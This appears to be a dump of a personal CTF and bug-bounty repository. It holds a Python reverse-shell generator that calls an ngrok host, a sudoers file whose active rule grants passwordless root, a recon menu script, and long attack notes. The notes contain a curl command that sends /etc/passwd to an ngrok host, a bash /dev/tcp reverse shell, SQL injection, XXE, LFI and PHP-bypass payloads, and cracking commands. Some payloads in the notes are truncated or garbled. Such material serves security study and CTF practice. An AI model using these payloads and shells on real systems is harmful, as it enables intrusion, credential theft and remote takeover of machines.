├── nc ├── requests.zip ├── centos1.repo ├── mm.js ├── all-payload4.html ├── key ├── asd.py ├── sudoers ├── automate.sh └── ctf.txt /nc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ranjit-git/CTF/HEAD/nc -------------------------------------------------------------------------------- /requests.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ranjit-git/CTF/HEAD/requests.zip -------------------------------------------------------------------------------- /centos1.repo: -------------------------------------------------------------------------------- 1 | [centos] 2 | name=CentOS-7 3 | baseurl=http://ftp.heanet.ie/pub/centos/7/os/x86_64/ 4 | enabled=1 5 | gpgcheck=1 6 | gpgkey=http://ftp.heanet.ie/pub/centos/7/os/x86_64/RPM-GPG-KEY-CentOS-7 7 | -------------------------------------------------------------------------------- /mm.js: -------------------------------------------------------------------------------- 1 | var request=require("/catalyst/functions/Root/node_modules/requests"); 2 | request('http://n5t6dff5n39mlth4prdsrd0o5fb5zu.burpcollaborator.net/apod?api_key=eeww', { json: true }, (err, ress, body) => { 3 | if (err) { return console.log(err); } 4 | //console.log(body.url); 5 | //console.log(body.explanation); 6 | }); 7 | -------------------------------------------------------------------------------- /all-payload4.html: -------------------------------------------------------------------------------- 1 | hgjg 2 | -------------------------------------------------------------------------------- /key: -------------------------------------------------------------------------------- 1 | ssh-rsa 
AAAAB3NzaC1yc2EAAAADAQABAAABAQDBy5UFPAyGQvnz9EskuaNVgjwCknZWnAeF5qPgb7RC9OGp3m07uHMv9x2R4M0rtmg2fI84LBkqj80AenDaF+W7k+h+Mc4E/q+MVQjc3/Qhfq2+Todm01n5eP2pU5oO23iS16KMTcdrYqMIU2rM1thT2PnjOdCP8AF9yNN/XRr3eD77qNiOYo5qKAn1+zZWCuI8S3J3RvicHneqEbRz0mDqxrYUQxH60LdAPQCI2VlfBx4eMpv9uzdUZ7tptLHi1w8oCIJsuNOwDYVUtX67r6P9PVOlUoIz6cOIXK+xwM4/NLOyNcQ/MTiY4ICAe07FF9V8apKq6oIKfkWjjDunvixz pahan@user-X550CA 2 | -------------------------------------------------------------------------------- /asd.py: -------------------------------------------------------------------------------- 1 | import sys 2 | 3 | #print sys.argv[1] 4 | print "Command: python a.py port output_file" 5 | l=""" 6 | import socket,subprocess,os; 7 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); 8 | s.connect(("0.tcp.ngrok.io","""+str(sys.argv[1])+""")); 9 | os.dup2(s.fileno(),0); 10 | os.dup2(s.fileno(),1); 11 | os.dup2(s.fileno(),2); 12 | p=subprocess.call(["/bin/sh","-i"]); 13 | """ 14 | f=open(sys.argv[2],"w") 15 | f.write(l) 16 | f.close() 17 | -------------------------------------------------------------------------------- /sudoers: -------------------------------------------------------------------------------- 1 | ## Sudoers allows particular users to run various commands as 2 | ## the root user, without needing the root password. 3 | ## 4 | ## Examples are provided at the bottom of the file for collections 5 | ## of related commands, which can then be delegated out to particular 6 | ## users or groups. 7 | ## 8 | ## This file must be edited with the 'visudo' command. 9 | 10 | ## Host Aliases 11 | ## Groups of machines. You may prefer to use hostnames (perhaps using 12 | ## wildcards for entire domains) or IP addresses instead. 
13 | # Host_Alias FILESERVERS = fs1, fs2 14 | # Host_Alias MAILSERVERS = smtp, smtp2 15 | 16 | ## User Aliases 17 | ## These aren't often necessary, as you can use regular groups 18 | ## (ie, from files, LDAP, NIS, etc) in this file - just use %groupname 19 | ## rather than USERALIAS 20 | # User_Alias ADMINS = jsmith, mikem 21 | 22 | 23 | ## Command Aliases 24 | ## These are groups of related commands... 25 | 26 | ## Networking 27 | # Cmnd_Alias NETWORKING = /sbin/route, /sbin/ifconfig, /bin/ping, /sbin/dhclient, /usr/bin/net, /sbin/iptables, /usr/bin/rfcomm, /usr/bin/wvdial, /sbin/iwconfig, /sbin/mii-tool 28 | 29 | ## Installation and management of software 30 | # Cmnd_Alias SOFTWARE = /bin/rpm, /usr/bin/up2date, /usr/bin/yum 31 | 32 | ## Services 33 | # Cmnd_Alias SERVICES = /sbin/service, /sbin/chkconfig 34 | 35 | ## Updating the locate database 36 | # Cmnd_Alias LOCATE = /usr/bin/updatedb 37 | 38 | ## Storage 39 | # Cmnd_Alias STORAGE = /sbin/fdisk, /sbin/sfdisk, /sbin/parted, /sbin/partprobe, /bin/mount, /bin/umount 40 | 41 | ## Delegating permissions 42 | # Cmnd_Alias DELEGATING = /usr/sbin/visudo, /bin/chown, /bin/chmod, /bin/chgrp 43 | 44 | ## Processes 45 | # Cmnd_Alias PROCESSES = /bin/nice, /bin/kill, /usr/bin/kill, /usr/bin/killall 46 | 47 | ## Drivers 48 | # Cmnd_Alias DRIVERS = /sbin/modprobe 49 | 50 | # Defaults specification 51 | 52 | # 53 | # Disable "ssh hostname sudo ", because it will show the password in clear. 54 | # You have to run "ssh -t hostname sudo ". 55 | # 56 | Defaults requiretty 57 | 58 | # 59 | # Refuse to run if unable to disable echo on the tty. This setting should also be 60 | # changed in order to be able to use sudo without a tty. See requiretty above. 61 | # 62 | Defaults !visiblepw 63 | 64 | # 65 | # Preserving HOME has security implications since many programs 66 | # use it when searching for configuration files. 
Note that HOME 67 | # is already set when the env_reset option is enabled, so 68 | # this option is only effective for configurations where either 69 | # env_reset is disabled or HOME is present in the env_keep list. 70 | # 71 | Defaults always_set_home 72 | 73 | Defaults env_reset 74 | Defaults env_keep = "COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR LS_COLORS" 75 | Defaults env_keep += "MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE" 76 | Defaults env_keep += "LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES" 77 | Defaults env_keep += "LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE" 78 | Defaults env_keep += "LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY" 79 | 80 | # 81 | # Adding HOME to env_keep may enable a user to run unrestricted 82 | # commands via sudo. 83 | # 84 | # Defaults env_keep += "HOME" 85 | 86 | Defaults secure_path = /sbin:/bin:/usr/sbin:/usr/bin 87 | 88 | ## Next comes the main part: which users can run what software on 89 | ## which machines (the sudoers file can be shared between multiple 90 | ## systems). 91 | ## Syntax: 92 | ## 93 | ## user MACHINE=COMMANDS 94 | ## 95 | ## The COMMANDS section may have other options added to it. 96 | ## 97 | ## Allow root to run any commands anywhere 98 | root ALL=(ALL) ALL 99 | 100 | ## Allows members of the 'sys' group to run networking, software, 101 | ## service management apps and more. 
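102 | # %sys ALL = NETWORKING, SOFTWARE, SERVICES, STORAGE, DELEGATING, PROCESSES, LOCATE, DRIVERS 103 | 104 | ## Allows people in group wheel to run all commands 105 | # %wheel ALL=(ALL) ALL 106 | 107 | ## Same thing without a password. NOTE(review): this is the rule that is actually active - every member of wheel gets unrestricted root with no password prompt, so an unattended or hijacked wheel shell is instantly root. Unless passwordless sudo is a deliberate requirement, use the password-prompting %wheel rule above, or limit NOPASSWD to a Cmnd_Alias. 108 | %wheel ALL=(ALL) NOPASSWD: ALL 109 | 110 | ## Allows members of the users group to mount and unmount the 111 | ## cdrom as root 112 | # %users ALL=/sbin/mount /mnt/cdrom, /sbin/umount /mnt/cdrom 113 | 114 | ## Allows members of the users group to shutdown this system 115 | # %users localhost=/sbin/shutdown -h now 116 | 117 | ## Read drop-in files from /etc/sudoers.d (the # here does not mean a comment) 118 | #includedir /etc/sudoers.d 119 | -------------------------------------------------------------------------------- /automate.sh: --------------------------------------------------------------------------------
#!/bin/bash
# Interactive recon menu: prints the tool/command hints for the chosen
# category and, for a few options, opens a search in firefox.
#
# The target domain is taken from $site_url (used by the Google dork, GitHub
# and Censys options). An exported site_url is honoured; otherwise it is
# prompted for, so those options no longer run with an empty target.

bold_red="$(tput bold)$(tput setaf 1)"
bold_yellow="$(tput bold)$(tput setaf 3)"
reset="$(tput sgr0)"

# Print one highlighted hint line (-e so the "\n" in multi-line hints expand).
hint() {
    echo -e " ${bold_yellow}$*${reset}"
}

if [ -z "$site_url" ]; then
    read -r -p " ${bold_red}URL=>${reset}" site_url
fi

echo " ${bold_yellow}1. GOOGLE DORK ${reset} ${bold_yellow}9. CMS ${reset} "
echo " ${bold_yellow}2. SUBDOMAIN ${reset} ${bold_yellow}10. OTHERS ${reset}"
echo " ${bold_yellow}3. GITHUB ${reset} ${bold_yellow}11. DNS ${reset}"
echo " ${bold_yellow}3a. GITROB ${reset} ${bold_yellow}11. DNS ${reset}"
echo " ${bold_yellow}4. S3 BUCKET ${reset} ${bold_yellow}12. OSINT ${reset}"
echo " ${bold_yellow}5. VIRTUAL HOST ${reset} ${bold_yellow}13. PROTOCOL EXPLOITER ${reset}"
echo " ${bold_yellow}6. SHODAN ${reset} ${bold_yellow}14. ANDROID APK ${reset}"
echo " ${bold_yellow}7. CENSYS ${reset} ${bold_yellow}15. CLOUDFRONT HIJACKER ${reset}"
echo " ${bold_yellow}8. LINKFINDER ${reset} ${bold_yellow}16. DIRECTORY SCANNER ${reset}"

read -r -p " ${bold_red}Choose options=>${reset}" options

case "$options" in
1 ) hint "try using api_key\n secret_key\n passwd\n aws_key\n github_token"
    firefox "http://google.com/search?q=site:$site_url api_key"
    pwd;;
2 ) hint "a.USING GOOGLE DORK"
    hint "b.USING CENSYS SUBFINDER"
    hint "c.USING CENSYS CERTIFICATE"
    hint "d.USING AQUATONE/SUBFINDER/KOCKPY"
    hint "e.USING DNSTRAIL"
    hint "f.TAKEOVER USING SUBOVER"
    read -r -p " ${bold_red}Choose options=>${reset}" options2
    case "$options2" in
    a ) firefox "http://google.com/search?q=site:*.$site_url -www";;
    # Was hard-coded to example.com; use the target that was prompted for.
    b ) python /home/user/Desktop/bug_bounty/bugbounty_testing-tools/censys-subdomain-finder/censys_subdomain_finder.py "$site_url";;
    # Was '"..."+url' (no string concatenation in bash, and $url was never set).
    c ) firefox "https://censys.io/ipv4?q=443.https.tls.certificate.parsed.extensions.subject_alt_name.dns_names%3A$site_url";;
    d ) hint "try all of them differently";;
    e ) hint "https://securitytrails.com/";;
    f ) hint "Desktop/bug_bounty/bugbounty_testing-tools/subdomain/takeover.py \n subover -l list.txt";;
    esac;;
3 ) firefox "https://github.com/search?utf8=✓&q=$site_url";;
3a) hint "gitrob strings";;
4 ) hint "a.GogetBucket";;
5 ) ;;
6 ) hint "try hostname:google.com\n port:8182,80\n org:google\n title:Dashboard [jenkins]";;
7 ) hint " 443.https.tls.certificate.parsed.extensions.subject_alt_name.dns_names%3A"
    hint "\"hackme.tld\" + internal"
    hint "\"hackme.tld\" + sandbox"
    hint "\"hackme.tld\" + staging"
    hint "\"hackme.tld\" + Development/Dev"
    hint "\"hackme.tld\" + production/prod";;
8 ) hint " Directory /home/user/Desktop/bug_bounty/bugbounty_testing-tools/linkfinder"
    hint " python linkfinder.py -i https://example.com -d"
    hint " python linkfinder.py -i https://example.com/1.js -o cli"
    hint " python linkfinder.py -i https://example.com/1.js -o results.html";;
9 ) hint "a.Drupwn"
    hint "b.Joomscan"
    hint "c.Wpscan"
    hint "d.CMSgeek (include all cms)";;
11 ) hint "a.Whonow (Dns rebinding attack)";;
12 ) hint "a.NAMECHK (username find in all website)"
    hint "./nameshk.sh username -au"
    hint "b.PwnedOrNot (find password from given email in all data leak)"
    hint "Desktop/bug_bounty/bugbounty_testing-tools/pwnedOrNot && pythonpownedornot.py"
    hint "c.Samurai (email discovery via dork,domain,company name)"
    hint "Desktop/bug_bounty/bugbounty_testing-tools/samurai/samurai.sh";;
13 ) hint "a.Metateta"
    hint "Desktop/bug_bounty/bugbounty_testing-tools/metateta"
    hint "run.py -R 192.168.1.15-255 -p smb -x exploit"
    hint "run.py -r 192.168.1.15 -p smtp -x scan"
    hint "run.py -f hosts.txt -p smb -x auxiliary"
    hint "b.AutoNSE"
    hint "Desktop/bug_bounty/bugbounty_testing-tools/autonse";;
14 ) hint "a.Diggy (extract endpoint from apk)"
    hint "/home/user/Desktop/bug_bounty/bugbounty_testing-tools/diggy/diggy.sh /home/a.apk"
    hint "b.ReverseApk (auto scanner and detecter)"
    hint "Desktop/bug_bounty/bugbounty_testing-tools/ReverseAPK/reverse-apk"
    hint "c.MobSF (auto scanner and detecter)"
    hint "/home/user/MobSF && sudo python manage.py runserver (auto scanner and detecter)"
    hint "login 192.168.191.189 && Desktop && sudo python3 manage.py runserver 192.168.191.189:8000";;
15 ) hint "a.CloudFrunt";;
16 ) hint "a.Dirb"
    hint "dirb http://example.com -X .php,.html"
    hint "b.Nikto"
    hint "c.Dirbuster"
    hint "d.Wfuzz (directory scanner & parameter bruteforcer)"
    hint "wfuzz -w /usr/share/wordlists/SecLists/Discovery/Web-Content/burp-parameter-names.txt -u http://10.10.10.69/sync?FUZZ=ls -c --hh 19 | tee fuzz.log";;
# The menu is numeric, so the old "Please answer yes or no." default was misleading.
* ) echo "Invalid option: $options" >&2;;
esac
-------------------------------------------------------------------------------- /ctf.txt: -------------------------------------------------------------------------------- 1 | IMPORTANT FACT 2 | ========================================================================= 3 | ***for CTF u must understand the hint 4 | ***curl -F shl=@/etc/passwd blablabla.ngrok.io 5 | ***entity_id=1+or+if(mid(@@version,1,1)=5,1,2)=2%23 6 | 7 | **during lfi testing try ..%2f..%2fetc 8 | **bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1 9 | **searchsploit for finding exploit 10 | 11 | *webscreenshot to capture shot of webpages 12 | *file://c:\WEB\HTML 13 | *magic hashes->https://www.whitehatsec.com/blog/magic-hashes/ 14 | *apache sometime directory listing 15 | *hashcat,hash-identifier 16 | *view page source, and visit every directory u found in source code 17 | ** check every possible way, dont be lazy 18 | **if any send message or comment try "> 202 | 203 | 204 | CROSSDOMAIN 205 | ============= 206 | https://sethsec.blogspot.in/2014/03/exploiting-misconfigured-crossdomainxml.html 207 | http://gursevkalra.blogspot.in/2013/08/bypassing-same-origin-policy-with-flash.html 208 | https://www.paladion.net/blogs/weak-crossdomain-xml-and-its-exploitation-poc 209 | 210 | API 211 | ======================= 212 | https://app.mavenlink.com/api/v1/users 213 | https://app.mavenlink.com/api/v1/users/me 214 | 215 | AUTH BYPASS 216 | ============ 217 | 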
https://login.mailchimp.com/oauth2/authorize?response_type=token&client_id=112041070777&redirect_uri=https%3A%2F%2Fapps.facebook.com%2F attacker%2F 218 | https://prakharprasad.com/facebook-mailchimp-application-oauth-2-0-misconfiguration/ 219 | 220 | FILE UPLOAD 221 | ============ 222 | 1.if image upload try 223 | a) imagemagick out-of-band 224 | b) imagemagick pillete extractor 225 | using https://github.com/neex/gifoeb 226 | ./gifoeb gen 1123x987 dump.jpg 227 | ./gifoeb gen 1123x987 dump.png 228 | ./gifoeb gen 1123x987 dump.bmp 229 | ./gifoeb gen 1123x987 dump.tiff 230 | ./gifoeb gen 1123x987 dump.tif 231 | 232 | 233 | for p in previews/*; do 234 | ./gifoeb recover $p | strings; 235 | done 236 | i)imagemagick curl vulnerability using svg 237 | 238 | https://hethical.io/trello-bug-bounty-access-servers-files-using-imagetragick/ 239 | 240 | c) pixel flood 241 | d) svg upload 242 | e) if image croping then try https://hackerone.com/reports/212696 243 | 2.if video upload 244 | a)ffmpeg ssrf 245 | b)if video caption the xss via subtitle 246 | 247 | 3.svg upload and xxe/xss/setting cookie 248 | 4.shell uploading by null byte/content type change/gif uploading... 
249 | 5.directory traversal 250 | 6.if docx,doc,xlsx upload 251 | a) try xxe 252 | 253 | APACHE 254 | ==================== 255 | Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection 256 | ------------------------------------- 257 | action:, redirect:, redirectAction:, method: 258 | http://host/struts2-blank/example/X.action?action:%25{3*4} 259 | https://www.exploit-db.com/exploits/44583/?rss&utm_source=dlvr.it&utm_medium=twitter 260 | 261 | 262 | XXE via spreadsheet(doc,docx,xlsx) 263 | ================================= 264 | **https://buer.haus/xxegen/ 265 | **goto https://github.com/BuffaloWill/oxml_xxe and generate many xxe payload file 266 | ** 267 | read file Read file xxe.xlsx\xl\worksheets\sheet1.xml and add payload 268 | ]> 269 | also u can add &xxe;inside root element or outside root element. 270 | 271 | **unzip docx and edit [Content_Types].xml with bellow payload 272 | 274 | %go2;]> 275 | zip -u xxe.docx \[Content_Types\].xml 276 | ** 277 | you can add payload in following file... 278 | DOCX=>/word/document.xml 279 | PPTX=>/ppt/presentation.xml 280 | XLSX=>/xl/workbook.xml 281 | 282 | XSS 283 | -------------- 284 | < !ENTITY post " 353 | 354 | 5.echo -en "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\n" | nc -q1 -u 11211 =>memcached server 355 | 356 | 6.w'h'o'am'i , w"h"o"am"i, who$@ami ,$0 = /bin/bash so , echo whoami|$0 357 | 358 | 7.padding oracle =>padbuster(bellow) detect using decode base64 and count caracter ,it wouldbe multipleof 8,16 359 | 360 | 8.PHP offers three frequently used methods of parsing and consuming XML: PHP DOM, SimpleXML and XMLReader. All three of these use the libxml2 extension and external entity support is enabled by default. As a consequence, PHP has a by-default vulnerability to XXE . 
DOMDocument::loadXML()====> also vulnerable to xxe 362 | 363 | $dom = new DOMDocument; 364 | $dom->loadXML($xmlString); 365 | this code is vulnerable to xxe 366 | 367 | mitigation (note: libxml_disable_entity_loader() is deprecated since PHP 8.0 because external entity loading is already disabled by default with libxml >= 2.9.0; on modern PHP the DOCTYPE check below is the part that still matters) 368 | -------- 369 | $oldValue = libxml_disable_entity_loader(true); 370 | $dom = new DOMDocument(); 371 | $dom->loadXML($xml); 372 | libxml_disable_entity_loader($oldValue); 373 | 374 | /** 375 | * Attempt a quickie detection (NOTE: the /[:space:]/ pattern below is a plain character class matching ':' and the letters s,p,a,c,e, not whitespace - use /\s/ or /[[:space:]]/) 376 | */ 377 | $collapsedXML = preg_replace("/[:space:]/", '', $xml); 378 | if(preg_match("/loadXML($xml); 388 | libxml_disable_entity_loader($oldValue); 389 | foreach ($dom->childNodes as $child) { 390 | if ($child->nodeType === XML_DOCUMENT_TYPE_NODE) { 391 | throw new \InvalidArgumentException( 392 | 'Invalid XML: Detected use of illegal DOCTYPE' 393 | ); 394 | } 395 | } 396 | 397 | 398 | 9. load('book.xml'); 401 | echo $doc->saveXML(); 402 | ?> it may also be vulnerable to directory traversal 403 | 404 | 10. 405 | filter_var($_GET['http_url'], FILTER_VALIDATE_URL); 406 | it allows javascript://foobar%0aalert(), php://, zip:// data:// - FILTER_VALIDATE_URL only checks URL syntax, not the scheme, so whitelist http/https explicitly 407 | 408 | 409 | DEBUGGING JAVASCRIPT 410 | ========================================================================================== 411 | chrome->source tab-> 412 | create breakpoint anywhere,refresh page,and hover over the variable before breakpoint and see variable value. 413 | in right side you can see all local and global variable value 414 | 415 | PHP 416 | ==================================================================================================================================================================== 417 | 1.TYPE JUGGLING 418 | ---------------- 419 | Try to use functions and operators that do not do implicit type conversions (e.g. === and not ==). Not all operators have strict versions (for example greater than and less than), and many built-in functions (like in_array) use weakly typed comparison functions by default. 420 | 421 | 2. 
shell execute(shell_exec,exec,proc_open,passthru,system backtick operator,popen,pcntl_exec) 422 | execute(eval,preg_replace with /e modifier,include[_once]/require[_once],create_function,assert(),file_get_contents,readfile,glob,mysql_query ) 423 | more=> https://stackoverflow.com/questions/3115559/exploitable-php-functions 424 | 425 | 3. 426 | $db_link = mysqli_connect('localhost', 'dbuser', 'dbpassword', 'dbname'); 427 | 428 | function can_access_feature($current_user) { 429 | global $db_link; 430 | $username = mysqli_real_escape_string($db_link, $current_user->username); 431 | $res = mysqli_query($db_link, "SELECT COUNT(id) FROM blacklisted_users WHERE username = '$username';"); 432 | $row = mysqli_fetch_array($res); 433 | if ((int)$row[0] > 0) { 434 | return false; 435 | } else { 436 | return true; 437 | } 438 | } 439 | 440 | for example, the database connection could fail, due to a wrong password or the server being down etc., or the connection could be closed by the server after it was opened client side. In these cases, by default the mysqli_ functions will issue warnings or notices, but will not throw exceptions or fatal errors. This means that the code simply carries on! The variable $row becomes NULL, and PHP will evaluate $row[0] also as NULL, and (int)$row[0] as 0, due to weak typing. Eventually the can_access_feature function returns true, giving access to all users, whether they are on the blacklist or not. Fix: fail closed - treat a failed query or a missing row as "no access" (e.g. if ($res === false) { return false; } before fetching, and return false when $row is NULL), and/or enable mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT) so driver errors throw instead of silently returning false. 441 | 442 | 4. 443 | $location = $_POST['location']; 444 | $filename = "./sites/".$user.".php"; 445 | ...................etc...................... 446 | $html = ""; 454 | $fp = fopen($filename, 'a+'); 455 | fputs($fp, $html) or die("Could not open file!"); 456 | 457 | pass this $location = "";?> 464 | 465 | http://127.0.0.1/test.php?code=system(whoami); 466 | ***must use termination statement ; 467 | 468 | 6. 469 | 476 | http://127.0.0.1/test/php?logged=1 and needs register_globals = On. 477 | 478 | 
XMLRPC 479 | ------------- 480 | test.method ','')); phpinfo(); exit;/* 481 | 482 | 8. 483 | ? 492 | http://example.com/inex.php/?page=’, ‘qwer’) === false && strlen(file_get_contents(“../../../../../etc/passwd”)) == 0 && strpos(‘1 493 | 494 | 9. $q=sprintf("UPDATE user set points=%d%s",$_GET['p'],$_GET[asd]]) 495 | here admin password is flag ,so we need to extract password using sql injection 496 | $_GET['p']=1 and $_GET['asd']=*hex(substr((select password),1,1)); //substr or substring both we can use 497 | 498 | 10. 499 | $validatedId = $_POST['id']; 500 | $pdo = new PDO('mysql:store.db'); 501 | $stmt = $pdo->prepare('SELECT * FROM transactions WHERE user_id = :id'); 502 | $stmt->bindParam(':id', $validatedId, PDO::PARAM_INT); 503 | $stmt->execute(); 504 | the value is bound as a parameter instead of being concatenated into the SQL text, so it cannot change the query structure (PDO::PARAM_INT additionally types it as an integer) - this is the fix for the sprintf/concatenation pattern in 9. 505 | 506 | 11. 507 | if($_GET["str1"] and $_GET["str2"]) { 508 | if ($_GET["str1"] !== $_GET["str2"] and 509 | hash("md5", $salt . $_GET["str1"]) === hash("md5", $salt . $_GET["str2"])) { 510 | echo $flag; 511 | } 512 | 513 | str1[]=xss&str2[]=asada (arrays: the two arrays differ, so !== is true, while hash() on an array returns NULL for both sides on PHP < 8 and NULL === NULL passes; PHP 8 throws a TypeError instead) 514 | 515 | 516 | code 517 | ========================================================================================= 518 | if(strcmp($PASSWORD, $_GET['password']) == 0){ 519 | $success = true; 520 | } 521 | if passed as password[]=AAAAA then it prints success (strcmp() on an array returns NULL with a warning on PHP < 8, and NULL == 0 is true; PHP 8 throws a TypeError, so this bypass is version-dependent - the fix is to reject non-string input and compare with ===, or better use password_verify()). 522 | 523 | WEB 524 | =============================================================================================== 525 | =============================================================================================== 526 | Problem 527 | ---------- 528 | The bad guys have hidden their access codes on an anonymous secure page service. Our intelligence tells us that the codes was posted on a page with id 43440b22864b30a0098f034eaf940730ca211a55, but unfortunately it's protected by a password, and only site moderators can view the post without the password. Can you help us recover the codes? 
529 | >>>for this type ctf we have to create a page with XSS payload and receive cookie and the session hijacking 530 | 531 | Returning fake Row 532 | ------------------------ 533 | random'AND 1=0 UNION ALL SELECT 'admin' AS username, 'hax' AS password, 2000 AS user_level, 10 AS dummy, 10 AS dummy2 -- 534 | 535 | Blind Sqli 536 | ---------------- 537 | admin' AND password LIKE "ya%" -- 538 | 539 | 540 | Perl Vulneraility 541 | =================== 542 | https://ehsandev.com/pico2014/web_exploitation/make_a_face.html 543 | http://www.cgisecurity.com/lib/sips.html 544 | 545 | ZIP/RAR cracker 546 | =================== 547 | 1.rar2john ./a.rar > hash.txt 548 | john ./hash.txt 549 | 2.fcrackzip 550 | fcrackzip -v -m zip6 -l 4-8 -u secret.zip 551 | PDF && PASSWORD 552 | ==================== 553 | rockyou.txt,500-passwords.txt 554 | pdfcrack --wordlist=crackstation-human-only.txt mypassword.pdf 555 | 556 | 557 | encryption/decryption 558 | ========================= 559 | https://quipqiup.com/ (cryptogram) 560 | http://rumkin.com/tools/cipher/ 561 | https://www.cs.drexel.edu/~introcs/Fa11/notes/10.1_Cryptography/RSA_Express_EncryptDecrypt.html 562 | *if does not know what it is try vegenere cypher 563 | https://www.guballa.de/vigenere-solver 564 | https://www.guballa.de/substitution-solver 565 | 566 | *foremost to recover file 567 | *unzip file using unzip so you can see also hidden file if there 568 | *xxd -e file //hexdump with hex and value 569 | binwalk 570 | ============= 571 | binwalk music.mp3 572 | binwalk --dd='.*' music.mp3 573 | 574 | Volatility 575 | ================== 576 | if a proceess running wireshark.exe then u can try search file abc.pcap etc 577 | volatility -f forensic_100.raw imageinfo //image information 578 | volatility -f forensic_100.raw dumpfiles 579 | volatility -f forensic_100.raw clipboard //clipboard content 580 | volatility -f forensic_100.raw cmdscan 581 | volatility -f forensic_100.raw cmdline 582 | volatility -f forensic_100.raw consoles 
583 | volatility -f forensic_100.raw connections 584 | volatility -f forensic_100.raw filescan //file scan 585 | volatility -f forensic_100.raw filescan|grep bat //filescan any extension like .bat,.exe,.vbs etc also can search folder name like this 586 | also search file with system username 587 | volatility -f forensic_100.raw dumpfiles -Q 0x..... -D folder //dump file with specified offset 588 | volatility -f forensic_100.raw sockscan 589 | volatility -f forensic_100.raw netscan 590 | volatility -f forensic_100.raw connscan 591 | volatility -f forensic_100.raw pslist //process list only visible process 592 | volatility -f forensic_100.raw psscan //view hidden process also and exit time 593 | volatility -f forensic_100.raw --profile=asd psxview // 594 | volatility -f forensic_100.raw --profile=WinXPSP3x86 sockets //socket lists 595 | volatility -f forensic_100.raw pslist |grep svchost 596 | volatility -f forensic_100.raw --profile=zzxz pslist |grep tcp 597 | volatility -f forensic_100.raw -p 1704 -D dump procdump //dump process memory 598 | strings dump/asd.exe | pdb //compare fake file 599 | 600 | HASH 601 | ================== 602 | 1. 
john --list=formats|grep -i md4 603 | john --format=Raw-MD4 test.md4 --show 604 | 2.john file //here in file put httpbasic auth 605 | 606 | md5 hash 607 | ================ 608 | 240610708=>0e462097431906509019562988736854 609 | 9QFHA$RNXGMR3IFDU=>0e11012cfa2a998691010213eebc6f98 610 | 4E8F8TK=>0e1100867d17d34f6b50be0e7d4a576d 611 | 5KWNPIES2BZZK=>0e1100864a0b680fa32cb64331ff48ad 612 | QNKCDZO=> 613 | BE||OJ@N =>0e110377766fb49c4d47a46eb4a1d8b8 614 | goto https://md5db.net/explore/ for specific pattern 615 | 616 | ** base32 data only contain CAPITAL letter and = 617 | 618 | **input() in python equivalent to eval(raw_input()) 619 | os.system('/bin/sh') input gives shell 620 | **if python script is obfuscated then may try decode to decimal or something 621 | 622 | RECYCLEBIN FORENSIC 623 | ================ 624 | use rifiuti2 625 | 626 | SYSTEM IMAGE FILE 627 | ================================ 628 | if u given any image file then you can mount it or use in TESTDISK. 629 | 630 | binwalk -A floppy.img //list architecture 631 | fdisk -l floppy.img //list partition of image 632 | 1.first try to mount it 633 | mount -t vfat -o loop flopy.img ./mnt 634 | 2.recover using testdisk 635 | testdisk floppy.img 636 | 3.recover using foremost 637 | 4.run using qemu 638 | qemu-system-x86_64 -fda floppy.img 639 | qemu run with gdb-peda https://github.com/VoidHack/write-ups/tree/master/Square%20CTF%202017/reverse/ 640 | 5.extract using dd 641 | dd if=./floppy.img of=./a.zip bs=1 skip=1234 //find this 1234 offset using binwalk floppy.img 642 | 643 | 6.can use this https://wiki.sleuthkit.org/index.php?title=TSK_Tool_Overview 644 | 645 | 646 | RSA 647 | ======================================================================================== 648 | 649 | openssl rsa -in task/bob3.pub -pubin -text -modulus 650 | openssl rsa -pubin -inform PEM -text -noout < bob.pub 651 | 652 | decrypt using private key + base64 encode of raw ciphertext 653 | 
---------------------------------------------------------- 654 | base64 -d flag.b64 | openssl rsautl -decrypt -inkey private.key | cat 655 | 656 | decrypt using private key+base64 of raw encrypt file 657 | ---------------------------------------------- 658 | 659 | def decrypt_RSA(privkey, message): 660 | from Crypto.PublicKey import RSA 661 | from base64 import b64decode 662 | key = open(privkey, "r").read() 663 | rsakey = RSA.importKey(key) 664 | decrypted = rsakey.decrypt(b64decode(message)) 665 | return decrypted 666 | flag = "Ni45iH4UnXSttNuf0Oy80+G5J7tm8sBJuDNN7qfTIdEKJow4siF2cpSbP/qIWDjSi+w=" //base64 encode of raw encrypted file like open('enc.txt','r').read().strip().encode('hex') 667 | print decrypt_RSA('private.key', flag) 668 | 669 | decrypt messeage from public key + raw ciphertext file 670 | ----------------------------------------------------- 671 | RsaCtfTool.py --publickey ./key.pub --uncipher ./flag --verbose --private //not recommended // ./flag is in base64 of raw data 672 | 673 | generate publickey from n and e 674 | ------------------------------- 675 | ./RsaCtfTool.py --createpub --n 4152 --e 53327 676 | for multiple key 677 | --------------- 678 | ./RsaCtfTool.py --publickey "*.key" --verbose --private 679 | for singlekey 680 | --------------------- 681 | ./RsaCtfTool.py --publickey "a.key" --verbose --private 682 | 683 | Decrypt using number ciphertext 684 | ------------------------- 685 | phi = (p- 1) * (q-1) 686 | d = libnum.modular.invmod(e, phi) 687 | print libnum.n2s(pow(c, d, N)) //c must be in number format 688 | 689 | Here p,q,N is number and c is ciphertext where 690 | c1=open('a.txt','r').read().strip().encode('hex') // a.txt file contain raw encrypt data 691 | c=0xc1 (here c1 is above cipher hex encode) 692 | 693 | also youcan get raw cipher text from number 694 | c is in number format. 
